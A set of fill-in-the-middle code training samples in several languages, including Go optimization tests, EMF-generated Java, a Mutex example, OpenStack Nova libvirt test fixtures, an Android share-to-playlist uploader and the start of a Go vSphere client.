// X is the location of the minimum. X may not be nil.
X []float64
// F is the value of the objective function at X.
F float64
// Global indicates if the location is a global minimum.<|fim▁hole|>}
type funcTest struct {
X []float64
// F is the expected function value at X.
F float64
// Gradient is the expected gradient at X. If nil, it is not evaluated.
Gradient []float64
}
// TODO(vladimir-ch): Decide and implement an exported testing function:
// func Test(f Function, ??? ) ??? {
// }
const (
defaultTol = 1e-12
defaultGradTol = 1e-9
defaultFDGradTol = 1e-5
)
// testFunction checks that the function can evaluate itself (and its gradient)
// correctly.
func testFunction(f function, ftests []funcTest, t *testing.T) {
// Make a copy of tests because we may append to the slice.
tests := make([]funcTest, len(ftests))
copy(tests, ftests)
// Get information about the function.
fMinima, isMinimumer := f.(minimumer)
fGradient, isGradient := f.(gradient)
// If the function is a Minimumer, append its minima to the tests.
if isMinimumer {
for _, minimum := range fMinima.Minima() {
// Allocate gradient only if the function can evaluate it.
var grad []float64
if isGradient {
grad = make([]float64, len(minimum.X))
}
tests = append(tests, funcTest{
X: minimum.X,
F: minimum.F,
Gradient: grad,
})
}
}
for i, test := range tests {
F := f.Func(test.X)
// Check that the function value is as expected.
if math.Abs(F-test.F) > defaultTol {
t.Errorf("Test #%d: function value given by Func is incorrect. Want: %v, Got: %v",
i, test.F, F)
}
if test.Gradient == nil {
continue
}
// Evaluate the finite difference gradient.
fdGrad := fd.Gradient(nil, f.Func, test.X, &fd.Settings{
Formula: fd.Central,
Step: 1e-6,
})
// Check that the finite difference and expected gradients match.
if !floats.EqualApprox(fdGrad, test.Gradient, defaultFDGradTol) {
dist := floats.Distance(fdGrad, test.Gradient, math.Inf(1))
t.Errorf("Test #%d: numerical and expected gradients do not match. |fdGrad - WantGrad|_∞ = %v",
i, dist)
}
// If the function is a Gradient, check that it computes the gradient correctly.
if isGradient {
grad := make([]float64, len(test.Gradient))
fGradient.Grad(grad, test.X)
if !floats.EqualApprox(grad, test.Gradient, defaultGradTol) {
dist := floats.Distance(grad, test.Gradient, math.Inf(1))
t.Errorf("Test #%d: gradient given by Grad is incorrect. |grad - WantGrad|_∞ = %v",
i, dist)
}
}
}
}<|fim▁end|> | Global bool |
<|file_name|>LevelBasedHierarchyImpl.java<|end_file_name|><|fim▁begin|>/**
* <copyright>
* </copyright>
*
* $Id$
*/
package orgomg.cwm.analysis.olap.impl;
import java.util.Collection;
import org.eclipse.emf.common.notify.NotificationChain;
import org.eclipse.emf.common.util.EList;
import org.eclipse.emf.ecore.EClass;
import org.eclipse.emf.ecore.InternalEObject;
import org.eclipse.emf.ecore.util.EObjectContainmentWithInverseEList;
import org.eclipse.emf.ecore.util.InternalEList;
import orgomg.cwm.analysis.olap.HierarchyLevelAssociation;
import orgomg.cwm.analysis.olap.LevelBasedHierarchy;
import orgomg.cwm.analysis.olap.OlapPackage;
/**
* <!-- begin-user-doc -->
* An implementation of the model object '<em><b>Level Based Hierarchy</b></em>'.
* <!-- end-user-doc -->
* <p>
* The following features are implemented:
* <ul>
* <li>{@link orgomg.cwm.analysis.olap.impl.LevelBasedHierarchyImpl#getHierarchyLevelAssociation <em>Hierarchy Level Association</em>}</li>
* </ul>
* </p>
*
* @generated
*/
public class LevelBasedHierarchyImpl extends HierarchyImpl implements LevelBasedHierarchy {
/**
* The cached value of the '{@link #getHierarchyLevelAssociation() <em>Hierarchy Level Association</em>}' containment reference list.
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @see #getHierarchyLevelAssociation()
* @generated
* @ordered
*/
protected EList<HierarchyLevelAssociation> hierarchyLevelAssociation;
/**
<|fim▁hole|> * <!-- end-user-doc -->
* @generated
*/
protected LevelBasedHierarchyImpl() {
super();
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
protected EClass eStaticClass() {
return OlapPackage.Literals.LEVEL_BASED_HIERARCHY;
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
public EList<HierarchyLevelAssociation> getHierarchyLevelAssociation() {
if (hierarchyLevelAssociation == null) {
hierarchyLevelAssociation = new EObjectContainmentWithInverseEList<HierarchyLevelAssociation>(HierarchyLevelAssociation.class, this, OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION, OlapPackage.HIERARCHY_LEVEL_ASSOCIATION__LEVEL_BASED_HIERARCHY);
}
return hierarchyLevelAssociation;
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@SuppressWarnings("unchecked")
@Override
public NotificationChain eInverseAdd(InternalEObject otherEnd, int featureID, NotificationChain msgs) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return ((InternalEList<InternalEObject>)(InternalEList<?>)getHierarchyLevelAssociation()).basicAdd(otherEnd, msgs);
}
return super.eInverseAdd(otherEnd, featureID, msgs);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public NotificationChain eInverseRemove(InternalEObject otherEnd, int featureID, NotificationChain msgs) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return ((InternalEList<?>)getHierarchyLevelAssociation()).basicRemove(otherEnd, msgs);
}
return super.eInverseRemove(otherEnd, featureID, msgs);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public Object eGet(int featureID, boolean resolve, boolean coreType) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return getHierarchyLevelAssociation();
}
return super.eGet(featureID, resolve, coreType);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@SuppressWarnings("unchecked")
@Override
public void eSet(int featureID, Object newValue) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
getHierarchyLevelAssociation().clear();
getHierarchyLevelAssociation().addAll((Collection<? extends HierarchyLevelAssociation>)newValue);
return;
}
super.eSet(featureID, newValue);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public void eUnset(int featureID) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
getHierarchyLevelAssociation().clear();
return;
}
super.eUnset(featureID);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public boolean eIsSet(int featureID) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return hierarchyLevelAssociation != null && !hierarchyLevelAssociation.isEmpty();
}
return super.eIsSet(featureID);
}
} //LevelBasedHierarchyImpl<|fim▁end|> | * <!-- begin-user-doc -->
|
<|file_name|>Mutex.java<|end_file_name|><|fim▁begin|>/*
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
/*
* This file is available under and governed by the GNU General Public
* License version 2 only, as published by the Free Software Foundation.
* However, the following notice accompanied the original version of this
* file:
*
* Written by Doug Lea with assistance from members of JCP JSR-166
* Expert Group and released to the public domain, as explained at
* http://creativecommons.org/publicdomain/zero/1.0/
*/
import java.util.concurrent.TimeUnit;
import java.util.concurrent.locks.AbstractQueuedSynchronizer;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.atomic.AtomicInteger;
import java.io.IOException;
import java.io.ObjectInputStream;
/**
* A sample user extension of AbstractQueuedSynchronizer.
*/
public class Mutex implements Lock, java.io.Serializable {<|fim▁hole|>
public boolean tryAcquire(int acquires) {
assert acquires == 1; // Does not use multiple acquires
return compareAndSetState(0, 1);
}
public boolean tryRelease(int releases) {
setState(0);
return true;
}
Condition newCondition() { return new ConditionObject(); }
private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
s.defaultReadObject();
setState(0); // reset to unlocked state
}
}
private final Sync sync = new Sync();
public void lock() {
sync.acquire(1);
}
public boolean tryLock() {
return sync.tryAcquire(1);
}
public void lockInterruptibly() throws InterruptedException {
sync.acquireInterruptibly(1);
}
public boolean tryLock(long timeout, TimeUnit unit) throws InterruptedException {
return sync.tryAcquireNanos(1, unit.toNanos(timeout));
}
public void unlock() { sync.release(1); }
public Condition newCondition() { return sync.newCondition(); }
public boolean isLocked() { return sync.isHeldExclusively(); }
public boolean hasQueuedThreads() { return sync.hasQueuedThreads(); }
}<|fim▁end|> | private static class Sync extends AbstractQueuedSynchronizer {
public boolean isHeldExclusively() { return getState() == 1; } |
<|file_name|>base.py<|end_file_name|><|fim▁begin|># Copyright (C) 2018 Red Hat, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software<|fim▁hole|># under the License.
import copy
import io
import fixtures
import mock
from nova import conf
from nova.tests import fixtures as nova_fixtures
from nova.tests.fixtures import libvirt as fakelibvirt
from nova.tests.functional import integrated_helpers
CONF = conf.CONF
class ServersTestBase(integrated_helpers._IntegratedTestBase):
"""A libvirt-specific variant of the integrated test base."""
ADDITIONAL_FILTERS = []
def setUp(self):
self.flags(instances_path=self.useFixture(fixtures.TempDir()).path)
self.computes = {}
self.compute_rp_uuids = {}
super(ServersTestBase, self).setUp()
self.useFixture(nova_fixtures.LibvirtImageBackendFixture())
self.useFixture(nova_fixtures.LibvirtFixture())
self.useFixture(nova_fixtures.OSBrickFixture())
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.LibvirtDriver._create_image',
return_value=(False, False)))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.LibvirtDriver._get_local_gb_info',
return_value={'total': 128, 'used': 44, 'free': 84}))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.driver.libvirt_utils.is_valid_hostname',
return_value=True))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.driver.libvirt_utils.file_open',
side_effect=lambda *a, **k: io.BytesIO(b'')))
self.useFixture(fixtures.MockPatch(
'nova.privsep.utils.supports_direct_io',
return_value=True))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.host.Host.get_online_cpus',
return_value=set(range(16))))
# Mock the 'get_connection' function, as we're going to need to provide
# custom capabilities for each test
_p = mock.patch('nova.virt.libvirt.host.Host.get_connection')
self.mock_conn = _p.start()
self.addCleanup(_p.stop)
def _setup_compute_service(self):
# NOTE(stephenfin): We don't start the compute service here as we wish
# to configure the host capabilities first. We instead start the
# service in the test
self.flags(compute_driver='libvirt.LibvirtDriver')
def _setup_scheduler_service(self):
enabled_filters = CONF.filter_scheduler.enabled_filters
enabled_filters += self.ADDITIONAL_FILTERS
self.flags(enabled_filters=enabled_filters, group='filter_scheduler')
return self.start_service('scheduler')
def _get_connection(
self, host_info=None, pci_info=None, mdev_info=None, vdpa_info=None,
libvirt_version=None, qemu_version=None, hostname=None,
):
if not host_info:
host_info = fakelibvirt.HostInfo(
cpu_nodes=2, cpu_sockets=1, cpu_cores=2, cpu_threads=2)
# sanity check
self.assertGreater(16, host_info.cpus,
"Host.get_online_cpus is only accounting for 16 CPUs but you're "
"requesting %d; change the mock or your test" % host_info.cpus)
libvirt_version = libvirt_version or fakelibvirt.FAKE_LIBVIRT_VERSION
qemu_version = qemu_version or fakelibvirt.FAKE_QEMU_VERSION
fake_connection = fakelibvirt.Connection(
'qemu:///system',
version=libvirt_version,
hv_version=qemu_version,
host_info=host_info,
pci_info=pci_info,
mdev_info=mdev_info,
vdpa_info=vdpa_info,
hostname=hostname)
return fake_connection
def start_compute(
self, hostname='compute1', host_info=None, pci_info=None,
mdev_info=None, vdpa_info=None, libvirt_version=None,
qemu_version=None,
):
"""Start a compute service.
The started service will be saved in self.computes, keyed by hostname.
:param hostname: A hostname.
:param host_info: A fakelibvirt.HostInfo object for the host. Defaults
to a HostInfo with 2 NUMA nodes, 2 cores per node, 2 threads per
core, and 16GB of RAM.
:returns: The hostname of the created service, which can be used to
lookup the created service and UUID of the assocaited resource
provider.
"""
def _start_compute(hostname, host_info):
fake_connection = self._get_connection(
host_info, pci_info, mdev_info, vdpa_info, libvirt_version,
qemu_version, hostname,
)
# This is fun. Firstly we need to do a global'ish mock so we can
# actually start the service.
with mock.patch('nova.virt.libvirt.host.Host.get_connection',
return_value=fake_connection):
compute = self.start_service('compute', host=hostname)
# Once that's done, we need to tweak the compute "service" to
# make sure it returns unique objects. We do this inside the
# mock context to avoid a small window between the end of the
# context and the tweaking where get_connection would revert to
# being an autospec mock.
compute.driver._host.get_connection = lambda: fake_connection
return compute
# ensure we haven't already registered services with these hostnames
self.assertNotIn(hostname, self.computes)
self.assertNotIn(hostname, self.compute_rp_uuids)
self.computes[hostname] = _start_compute(hostname, host_info)
self.compute_rp_uuids[hostname] = self.placement.get(
'/resource_providers?name=%s' % hostname).body[
'resource_providers'][0]['uuid']
return hostname
class LibvirtMigrationMixin(object):
"""A simple mixin to facilliate successful libvirt live migrations
Requires that the test class set self.server for the specific test instnace
and self.{src,dest} to indicate the direction of the migration. For any
scenarios more complex than this they should override _migrate_stub with
their own implementation.
"""
def setUp(self):
super().setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.tests.fixtures.libvirt.Domain.migrateToURI3',
self._migrate_stub))
self.migrate_stub_ran = False
def _migrate_stub(self, domain, destination, params, flags):
self.dest.driver._host.get_connection().createXML(
params['destination_xml'],
'fake-createXML-doesnt-care-about-flags')
conn = self.src.driver._host.get_connection()
dom = conn.lookupByUUIDString(self.server['id'])
dom.complete_job()
self.migrate_stub_ran = True
class LibvirtNeutronFixture(nova_fixtures.NeutronFixture):
"""A custom variant of the stock neutron fixture with more networks.
There are three networks available: two l2 networks (one flat and one VLAN)
and one l3 network (VXLAN).
"""
network_1 = {
'id': '3cb9bc59-5699-4588-a4b1-b87f96708bc6',
'status': 'ACTIVE',
'subnets': [],
'name': 'physical-network-foo',
'admin_state_up': True,
'tenant_id': nova_fixtures.NeutronFixture.tenant_id,
'provider:physical_network': 'foo',
'provider:network_type': 'flat',
'provider:segmentation_id': None,
}
network_2 = network_1.copy()
network_2.update({
'id': 'a252b8cd-2d99-4e82-9a97-ec1217c496f5',
'name': 'physical-network-bar',
'provider:physical_network': 'bar',
'provider:network_type': 'vlan',
'provider:segmentation_id': 123,
})
network_3 = network_1.copy()
network_3.update({
'id': '877a79cc-295b-4b80-9606-092bf132931e',
'name': 'tunneled-network',
'provider:physical_network': None,
'provider:network_type': 'vxlan',
'provider:segmentation_id': 69,
})
network_4 = network_1.copy()
network_4.update({
'id': '1b70879f-fd00-411e-8ea9-143e7820e61d',
'name': 'private-network',
'shared': False,
'provider:physical_network': 'physnet4',
"provider:network_type": "vlan",
'provider:segmentation_id': 42,
})
subnet_1 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_1.update({
'name': 'physical-subnet-foo',
})
subnet_2 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_2.update({
'id': 'b4c13749-c002-47ed-bf42-8b1d44fa9ff2',
'name': 'physical-subnet-bar',
'network_id': network_2['id'],
})
subnet_3 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_3.update({
'id': '4dacb20b-917f-4275-aa75-825894553442',
'name': 'tunneled-subnet',
'network_id': network_3['id'],
})
subnet_4 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_4.update({
'id': '7cb343ec-6637-494c-89a1-8890eab7788e',
'name': 'physical-subnet-bar',
'network_id': network_4['id'],
})
network_1['subnets'] = [subnet_1]
network_2['subnets'] = [subnet_2]
network_3['subnets'] = [subnet_3]
network_4['subnets'] = [subnet_4]
network_1_port_2 = {
'id': 'f32582b5-8694-4be8-9a52-c5732f601c9d',
'network_id': network_1['id'],
'status': 'ACTIVE',
'mac_address': '71:ce:c7:8b:cd:dc',
'fixed_ips': [
{
'ip_address': '192.168.1.10',
'subnet_id': subnet_1['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_1_port_3 = {
'id': '9c7580a0-8b01-41f3-ba07-a114709a4b74',
'network_id': network_1['id'],
'status': 'ACTIVE',
'mac_address': '71:ce:c7:2b:cd:dc',
'fixed_ips': [
{
'ip_address': '192.168.1.11',
'subnet_id': subnet_1['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_2_port_1 = {
'id': '67d36444-6353-40f5-9e92-59346cf0dfda',
'network_id': network_2['id'],
'status': 'ACTIVE',
'mac_address': 'd2:0b:fd:d7:89:9b',
'fixed_ips': [
{
'ip_address': '192.168.1.6',
'subnet_id': subnet_2['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_3_port_1 = {
'id': '4bfa1dc4-4354-4840-b0b4-f06196fa1344',
'network_id': network_3['id'],
'status': 'ACTIVE',
'mac_address': 'd2:0b:fd:99:89:9b',
'fixed_ips': [
{
'ip_address': '192.168.2.6',
'subnet_id': subnet_3['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_4_port_1 = {
'id': 'b4cd0b93-2ac8-40a7-9fa4-2cd680ccdf3e',
'network_id': network_4['id'],
'status': 'ACTIVE',
'mac_address': 'b5:bc:2e:e7:51:ee',
'fixed_ips': [
{
'ip_address': '192.168.4.6',
'subnet_id': subnet_4['id']
}
],
'binding:vif_details': {'vlan': 42},
'binding:vif_type': 'hw_veb',
'binding:vnic_type': 'direct',
}
network_4_port_2 = {
'id': '4a0e3b05-4704-4adb-bfb1-f31f0e4d1bdc',
'network_id': network_4['id'],
'status': 'ACTIVE',
'mac_address': 'b5:bc:2e:e7:51:ef',
'fixed_ips': [
{
'ip_address': '192.168.4.7',
'subnet_id': subnet_4['id']
}
],
'binding:vif_details': {'vlan': 42},
'binding:vif_type': 'hw_veb',
'binding:vnic_type': 'direct',
}
network_4_port_3 = {
'id': 'fb2de1a1-d096-41be-9dbe-43066da64804',
'network_id': network_4['id'],
'status': 'ACTIVE',
'mac_address': 'b5:bc:2e:e7:51:ff',
'fixed_ips': [
{
'ip_address': '192.168.4.8',
'subnet_id': subnet_4['id']
}
],
'binding:vif_details': {'vlan': 42},
'binding:vif_type': 'hw_veb',
'binding:vnic_type': 'direct',
}
def __init__(self, test):
super(LibvirtNeutronFixture, self).__init__(test)
self._networks = {
self.network_1['id']: self.network_1,
self.network_2['id']: self.network_2,
self.network_3['id']: self.network_3,
self.network_4['id']: self.network_4,
}
self._net1_ports = [self.network_1_port_2, self.network_1_port_3]
def create_port(self, body=None):
network_id = body['port']['network_id']
assert network_id in self._networks, ('Network %s not in fixture' %
network_id)
if network_id == self.network_1['id']:
port = self._net1_ports.pop(0)
elif network_id == self.network_2['id']:
port = self.network_2_port_1
elif network_id == self.network_3['id']:
port = self.network_3_port_1
elif network_id == self.network_4['id']:
port = self.network_4_port_1
# this copy is here to avoid modifying class variables like
# network_2_port_1 below at the update call
port = copy.deepcopy(port)
port.update(body['port'])
# the tenant ID is normally extracted from credentials in the request
# and is not present in the body
if 'tenant_id' not in port:
port['tenant_id'] = nova_fixtures.NeutronFixture.tenant_id
# similarly, these attributes are set by neutron itself
port['admin_state_up'] = True
self._ports[port['id']] = port
# this copy is here as nova sometimes modifies the returned port
# locally and we want to avoid that nova modifies the fixture internals
return {'port': copy.deepcopy(port)}<|fim▁end|> | # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations |
<|file_name|>RuleBuilder.java<|end_file_name|><|fim▁begin|>/**
* Copyright 2016 William Van Woensel
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
*
* @author wvw
*
*/
package wvw.utils.rule.builder;
public abstract class RuleBuilder {
protected String id;
protected StringBuffer templateClause = new StringBuffer();
protected StringBuffer conditionClause = new StringBuffer();
public RuleBuilder() {
}
public RuleBuilder(String id) {
this.id = id;
}
public void appendTemplate(String template) {
templateClause.append("\t").append(template);
}
public void appendCondition(String condition) {
conditionClause.append("\t").append(condition);
}
<|fim▁hole|> }
public abstract String toString();
}<|fim▁end|> | public String getId() {
return id; |
<|file_name|>index.js<|end_file_name|><|fim▁begin|>var config = require('../config'),
mongoose = require('mongoose'),
fixtures = require('node-mongoose-fixtures'),
Q = require('q');
<|fim▁hole|>
defer.promise.then(function() {
console.log('Done');
process.exit(0);
});<|fim▁end|> | // Connect to database
mongoose.connect(config.mongo.uri, config.mongo.options);
var defer = Q.defer(); |
<|file_name|>EnqueueActivity.java<|end_file_name|><|fim▁begin|>package com.gmail.altakey.ray;
import android.app.Activity;
import android.os.Bundle;
import android.os.Parcelable;
import android.net.Uri;
import android.content.Intent;
import android.widget.Toast;
import android.util.Log;
import android.net.http.AndroidHttpClient;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.mime.content.FileBody;
import org.apache.http.entity.mime.MultipartEntity;
import org.apache.http.util.EntityUtils;
import java.io.File;
import java.io.IOException;
import java.util.Random;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.nio.channels.ReadableByteChannel;
import java.nio.*;
import android.os.AsyncTask;
import android.view.View;
import android.view.ViewGroup;
import android.view.LayoutInflater;
import android.widget.EditText;
import android.app.AlertDialog;
import android.content.DialogInterface;
import java.util.*;
public class EnqueueActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
final String action = getIntent().getAction();
final Bundle extras = getIntent().getExtras();
if (Intent.ACTION_SEND.equals(action)) {
if (extras.containsKey(Intent.EXTRA_STREAM)) {
new EnqueueTaskInvoker((Uri)extras.getParcelable(Intent.EXTRA_STREAM)).invokeOnFriend();
}
} else if (Intent.ACTION_SEND_MULTIPLE.equals(action)) {
if (extras.containsKey(Intent.EXTRA_STREAM)) {
for (Parcelable p : extras.getParcelableArrayList(Intent.EXTRA_STREAM)) {
new EnqueueTaskInvoker((Uri)p).invokeOnFriend();
}
}
} else {
finish();
}
}
private class EnqueueTaskInvoker {
private Uri mmForUri;
private List<String> mmOptions = new LinkedList<String>();
public EnqueueTaskInvoker(Uri forUri) {
mmForUri = forUri;
mmOptions.add("(local)");
mmOptions.add("10.0.0.50");
mmOptions.add("10.0.0.52");
mmOptions.add("192.168.1.15");
mmOptions.add("192.168.1.17");
mmOptions.add("Other...");
}
public void invokeOnFriend() {
AlertDialog.Builder builder = new AlertDialog.Builder(EnqueueActivity.this);
builder
.setTitle(R.string.dialog_title_send_to)
.setOnCancelListener(new CancelAction())
.setItems(mmOptions.toArray(new String[0]), new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
String choice = mmOptions.get(which);
if (choice != null) {
if ("Other...".equals(choice)) {
LayoutInflater inflater = getLayoutInflater();
View layout = inflater.inflate(
R.layout.friend,
(ViewGroup)findViewById(R.id.root));
AlertDialog.Builder builder = new AlertDialog.Builder(EnqueueActivity.this);
EditText field = (EditText)layout.findViewById(R.id.name);
builder
.setTitle(R.string.dialog_title_send_to)
.setView(layout)
.setOnCancelListener(new CancelAction())
.setNegativeButton(android.R.string.cancel, new CancelAction())
.setPositiveButton(android.R.string.ok, new ConfirmAction(field));
dialog.dismiss();
builder.create().show();
} else if ("(local)".equals(choice)) {
dialog.dismiss();
new EnqueueToFriendTask("localhost:8080", mmForUri).execute();
finish();
} else {
dialog.dismiss();
new EnqueueToFriendTask(String.format("%s:8080", choice), mmForUri).execute();
finish();
}
} else {
dialog.dismiss();
}
}
});
builder.create().show();
}
private class CancelAction implements DialogInterface.OnClickListener, DialogInterface.OnCancelListener {
@Override
public void onClick(DialogInterface dialog, int which) {
dialog.dismiss();
finish();
}
@Override
public void onCancel(DialogInterface dialog) {
dialog.dismiss();
finish();
}
}
private class ConfirmAction implements DialogInterface.OnClickListener {
private EditText mmmField;
public ConfirmAction(EditText field) {
mmmField = field;
}
@Override
public void onClick(DialogInterface dialog, int which) {
String name = mmmField.getText().toString();
dialog.dismiss();
new EnqueueToFriendTask(name, mmForUri).execute();
finish();
}
}
}
private class EnqueueToFriendTask extends AsyncTask<Void, Void, Throwable> {
private Uri mmUri;
private String mmFriendAddress;
public EnqueueToFriendTask(String friendAddress, Uri uri) {
mmUri = uri;
mmFriendAddress = friendAddress;
}
@Override
public void onPreExecute() {
Toast.makeText(EnqueueActivity.this, "Sending...", Toast.LENGTH_LONG).show();
}
@Override
public Throwable doInBackground(Void... args) {
File tempFile = null;
try {
tempFile = new Cacher().cache();
new Enqueuer(tempFile).enqueue();
return null;
} catch (IOException e) {
Log.e("EA", "Cannot send to remote playlist", e);
return e;
} finally {
if (tempFile != null) {
tempFile.delete();
}
}
}
@Override
public void onPostExecute(Throwable ret) {
if (ret == null) {<|fim▁hole|> }
private class Enqueuer {
private AndroidHttpClient mmmHttpClient;
private File mmmBlob;
public Enqueuer(File blob) {
mmmHttpClient = AndroidHttpClient.newInstance(getUserAgent());
mmmBlob = blob;
}
private String getUserAgent() {
return String.format("%s/%s", getString(R.string.app_name), "0.0.1");
}
public void enqueue() throws IOException {
HttpPost req = new HttpPost(String.format("http://%s", mmFriendAddress));
MultipartEntity entity = new MultipartEntity();
entity.addPart("stream", new FileBody(mmmBlob, "application/octet-stream"));
req.setEntity(entity);
int code = mmmHttpClient.execute(req).getStatusLine().getStatusCode();
Log.d("EA", String.format("posted, code=%d", code));
}
}
private class Cacher {
public File cache() throws IOException {
FileChannel src = null;
FileChannel dest = null;
File destFile = null;
try {
destFile = new File(root(), randomName());
src = new FileInputStream(getContentResolver().openFileDescriptor(mmUri, "r").getFileDescriptor()).getChannel();
dest = new FileOutputStream(destFile).getChannel();
dest.transferFrom(src, 0, Integer.MAX_VALUE);
Log.d("MA", String.format("cached %s as %s", mmUri.toString(), destFile.getName()));
return destFile;
} catch (IOException e) {
Log.e("MA", "cannot cache", e);
destFile.delete();
throw e;
} finally {
if (src != null) {
try {
src.close();
} catch (IOException e) {
}
}
if (dest != null) {
try {
dest.close();
} catch (IOException e) {
}
}
}
}
private String randomName() {
byte[] buffer = new byte[32];
new Random().nextBytes(buffer);
StringBuilder sb = new StringBuilder();
try {
for (byte b : MessageDigest.getInstance("MD5").digest(buffer)) {
sb.append(Integer.toHexString(((int)b) & 0xff));
}
return sb.toString();
} catch (NoSuchAlgorithmException e) {
throw new RuntimeException(e);
}
}
private File root() {
return getExternalFilesDir(null);
}
}
}
}<|fim▁end|> | Toast.makeText(EnqueueActivity.this, "Sent to remote playlist.", Toast.LENGTH_SHORT).show();
} else {
Toast.makeText(EnqueueActivity.this, "Cannot send to remote playlist", Toast.LENGTH_SHORT).show();
} |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>use num::Integer;<|fim▁hole|>use rand::Rng;
pub mod constants;
pub fn get_random_bool() -> bool {
let mut rnd = rand::thread_rng();
rnd.gen()
}
pub fn get_rand_from_range<T>(min: T, max: T) -> T
where T: Integer + SampleUniform {
let mut rnd = rand::thread_rng();
rnd.gen_range(min, max)
}
#[allow(dead_code)]
pub fn get_weighted_random(weight: f32) -> bool {
let mut rnd = rand::thread_rng();
rnd.gen::<f32>() < weight
}<|fim▁end|> | use rand::distributions::uniform::SampleUniform; |
<|file_name|>vsphere_session.go<|end_file_name|><|fim▁begin|>// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/.
package vim
import (
"net/http"
"github.com/cloudescape/govsphere/vim/soap"
)
type VSphereSession struct {
sessionId string
soapClient *soap.Client
ServiceInstance *ServiceInstance
ServiceContent *ServiceContent
UserSession *UserSession
}
// For now, let's only support
// one vSphere session per App
var session *VSphereSession
const (
APIv4_0 string = "urn:vim25/4.0"
APIv4_1 string = "urn:vim25/4.1"
APIv5_0 string = "urn:vim25/5.0"
APIv5_1 string = "urn:vim25/5.1"
APIv5_5 string = "urn:vim25/5.5"
)
func NewVSphereSession(url, user, pass string, ignoreCert bool) *VSphereSession {
// For now, let's only support
// one vSphere session per App
if session != nil {
return session
}
if url == "" {
panic("Server URL is required")
}
objref := &ManagedObjectReference{
Type: "ServiceInstance",
Value: "ServiceInstance",
}
service := &ServiceInstance{
ManagedObject: &ManagedObject{
ManagedObjectReference: objref,
},
}
// Since we do not know the latest version supported by
// the vSphere server yet, we use the oldest possible first.
soapClient := soap.NewClient(url, APIv4_0, ignoreCert)
session = &VSphereSession{
